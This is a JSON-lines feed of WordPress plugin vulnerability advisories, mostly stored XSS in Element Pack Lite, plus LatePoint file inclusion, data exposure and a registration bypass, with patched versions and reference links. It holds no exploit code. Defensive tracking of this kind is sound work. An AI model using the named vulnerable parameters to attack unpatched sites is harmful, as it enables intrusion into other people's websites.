{"CVE_ID":"CVE-2025-5292","slug":"bdthemes-element-pack-lite","versionImpact":"5.11.2","versionEndExcluding":"5.11.3","description":"The Element Pack Addons for Elementor \u2013 Best Elementor addons with Ready Templates, Blocks, Widgets and WooCommerce Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'marker_content\u2019 parameter in all versions up to, and including, 5.11.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.11.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302152\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302152\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8dfdd8-820c-4066-8014-2cb5b9f935a4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ab8dfdd8-820c-4066-8014-2cb5b9f935a4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13464","slug":"library-bookshelves","versionImpact":"5.10","versionEndExcluding":"5.11","description":"The Library Bookshelves plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bookshelf' shortcode in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/trunk\\\/functions.php#L681\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-bookshelves\\\/trunk\\\/functions.php#L681\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6b75ae7-89d9-4dd4-85c1-c12369bd86c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6b75ae7-89d9-4dd4-85c1-c12369bd86c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9058","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.5","versionEndExcluding":"5.10.6","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Lightbox widget in all versions up to, and including, 5.10.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189994\\\/bdthemes-element-pack-lite\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189994\\\/bdthemes-element-pack-lite\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e343ea3-996c-47c7-9480-e6264cbded98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e343ea3-996c-47c7-9480-e6264cbded98?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1458","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.29","versionEndExcluding":"5.10.30","description":"The Element Pack Addons for Elementor \u2013 Free Templates and Widgets for Your WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets like Dual Button, Creative Button, Image Stack and more in all versions up to, and including, 5.10.29 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3277466%40bdthemes-element-pack-lite&new=3277466%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3277466%40bdthemes-element-pack-lite&new=3277466%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbd3170-a45b-4ae6-bc59-4cfb92f6c2a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fbd3170-a45b-4ae6-bc59-4cfb92f6c2a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9867","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Open Map Widget' marker_content parameter in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca2bd96-ac3c-480c-8fe7-fb5227a093ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca2bd96-ac3c-480c-8fe7-fb5227a093ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9657","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tooltip' parameter in all versions up to, and including, 5.10.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eb77e9-7e0b-4134-9cb6-30ba78f6a686?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67eb77e9-7e0b-4134-9cb6-30ba78f6a686?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-tooltip.js#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-tooltip.js#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-reading-timer.js#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-reading-timer.js#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-logo-grid.js#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-logo-grid.js#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-image-stack.js#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-image-stack.js#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.js#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.js#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3180563\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10493","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) WordPress plugin before 5.10.3 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e7f7196-054b-4cfd-9219-c60bb8275e8d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e7f7196-054b-4cfd-9219-c60bb8275e8d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10980","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.2","versionEndExcluding":"5.10.3","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) WordPress plugin before 5.10.3 does not validate and escape some of its Cookie Consent block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.10.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915daad8-d14c-4457-a3a0-aa21744f4ae0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/915daad8-d14c-4457-a3a0-aa21744f4ae0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1457","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.28","versionEndExcluding":"5.10.29","description":"The Element Pack Addons for Elementor \u2013 Free Templates and Widgets for Your WordPress Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Wrapper Link, Countdown and Gallery widgets in all versions up to, and including, 5.10.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/assets\\\/js\\\/modules\\\/ep-wrapper-link.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1095\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1095\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1097\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3272946%40bdthemes-element-pack-lite&new=3272946%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=#file1097\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6ac5484-3caa-4821-990b-cd49c2c4873d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6ac5484-3caa-4821-990b-cd49c2c4873d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9868","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.1","versionEndExcluding":"5.10.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Age Gate Widget 'url' parameter in all versions up to, and including, 5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94efdb07-653b-4838-b584-e45e9ab9b7a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94efdb07-653b-4838-b584-e45e9ab9b7a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/age-gate\\\/widgets\\\/age-gate.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/age-gate\\\/widgets\\\/age-gate.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10310","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.1","versionEndExcluding":"5.10.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom Gallery Widget 'image_title' parameter in all versions up to, and including, 5.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/144d755a-e61a-4ecd-9d9a-9c6e3a1e6ea2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/144d755a-e61a-4ecd-9d9a-9c6e3a1e6ea2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3176764\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/custom-gallery\\\/widgets\\\/custom-gallery.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12851","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.14","versionEndExcluding":"5.10.15","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom_attributes parameter of the Cookie Consent Widget in all versions up to, and including, 5.10.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.10.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212890%40bdthemes-element-pack-lite&new=3212890%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212890%40bdthemes-element-pack-lite&new=3212890%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b0af74-f773-4a56-b169-2ee11e923813?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b0af74-f773-4a56-b169-2ee11e923813?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11852","slug":"bdthemes-element-pack-lite","versionImpact":"5.10.12","versionEndExcluding":"5.10.13","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid, Carousel and Remote Arrows) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_layouts() function in all versions up to, and including, 5.10.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain a detailed listing of layout templates.","recommendation":"Update to version 5.10.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/includes\\\/template-library\\\/editor\\\/manager\\\/api.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/includes\\\/template-library\\\/editor\\\/manager\\\/api.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3208986%40bdthemes-element-pack-lite%2Ftrunk&old=3204020%40bdthemes-element-pack-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3208986%40bdthemes-element-pack-lite%2Ftrunk&old=3204020%40bdthemes-element-pack-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2d23e6f-d48f-4734-95f8-12bd58eb1c2f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6715","slug":"latepoint","versionImpact":"5.1.93","versionEndExcluding":"5.1.94","description":"The LatePoint  WordPress plugin before 5.1.94 is vulnerable to Local File Inclusion via the layout parameter. This makes it possible for attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 5.1.94, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/357aba51-b65e-4691-864b-fef1c78a9362\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3769","slug":"latepoint","versionImpact":"5.1.92","versionEndExcluding":"5.1.93","description":"The LatePoint \u2013 Calendar Booking Plugin for Appointments and Events plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.92 via the 'view_booking_summary_in_lightbox' due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to retrieve appointment details such as customer names and email addresses.","recommendation":"Update to version 5.1.93, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latepoint\\\/trunk\\\/lib\\\/controllers\\\/customer_cabinet_controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latepoint\\\/trunk\\\/lib\\\/controllers\\\/customer_cabinet_controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3291162\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3291162\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e9acd26-c341-4ece-bcf1-102f953a4b4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e9acd26-c341-4ece-bcf1-102f953a4b4f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3601","slug":"poll-maker","versionImpact":"5.1.8","versionEndExcluding":"5.1.9","description":"The Poll Maker \u2013 Best WordPress Poll Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ays_poll_create_author function in all versions up to, and including, 5.1.8. This makes it possible for unauthenticated attackers to extract email addresses by enumerating them one character at a time.","recommendation":"Update to version 5.1.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0505a1-c7c4-4cf1-97cd-123a4dddcea3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc0505a1-c7c4-4cf1-97cd-123a4dddcea3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071296%40poll-maker&new=3071296%40poll-maker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3071296%40poll-maker&new=3071296%40poll-maker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4810","slug":"dk-pricr-responsive-pricing-table","versionEndExcluding":"5.1.8","description":"The Responsive Pricing Table WordPress plugin before 5.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 5.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/portswigger.net\\\/web-security\\\/cross-site-scripting\\\/stored\",\"name\":\"https:\\\/\\\/portswigger.net\\\/web-security\\\/cross-site-scripting\\\/stored\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfde5436-dd5c-4c70-a9c2-3cb85cc99c0a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dfde5436-dd5c-4c70-a9c2-3cb85cc99c0a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12329","slug":"essential-real-estate","versionImpact":"5.1.6","versionEndExcluding":"5.1.7","description":"The Essential Real Estate plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on several pages\/post types in all versions up to, and including, 5.1.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to access invoices and transaction logs","recommendation":"Update to version 5.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204549%40essential-real-estate&new=3204549%40essential-real-estate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204549%40essential-real-estate&new=3204549%40essential-real-estate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa5b1bf3-344e-4ae6-87b9-2dcaafd417a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa5b1bf3-344e-4ae6-87b9-2dcaafd417a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0618","slug":"fluentform","versionEndExcluding":"5.1.7","description":"The Contact Form Plugin \u2013 Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0348d465-f351-4c52-b293-8b3b058292b9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0348d465-f351-4c52-b293-8b3b058292b9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022938\\\/fluentform\\\/tags\\\/5.1.7\\\/app\\\/Helpers\\\/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3022938\\\/fluentform\\\/tags\\\/5.1.7\\\/app\\\/Helpers\\\/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0618\\\/\",\"name\":\"https:\\\/\\\/advisory.abay.sh\\\/cve-2024-0618\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2568","slug":"gallery-photo-gallery","versionEndExcluding":"5.1.7","description":"The Photo Gallery by Ays WordPress plugin before 5.1.7 does not escape some parameters before outputting it back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1704a12-459b-4f5d-aa2d-a96646ddaf3e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1704a12-459b-4f5d-aa2d-a96646ddaf3e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0701","slug":"userpro","versionImpact":"5.1.6","versionEndExcluding":"5.1.7","description":"The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator.","recommendation":"Update to version 5.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
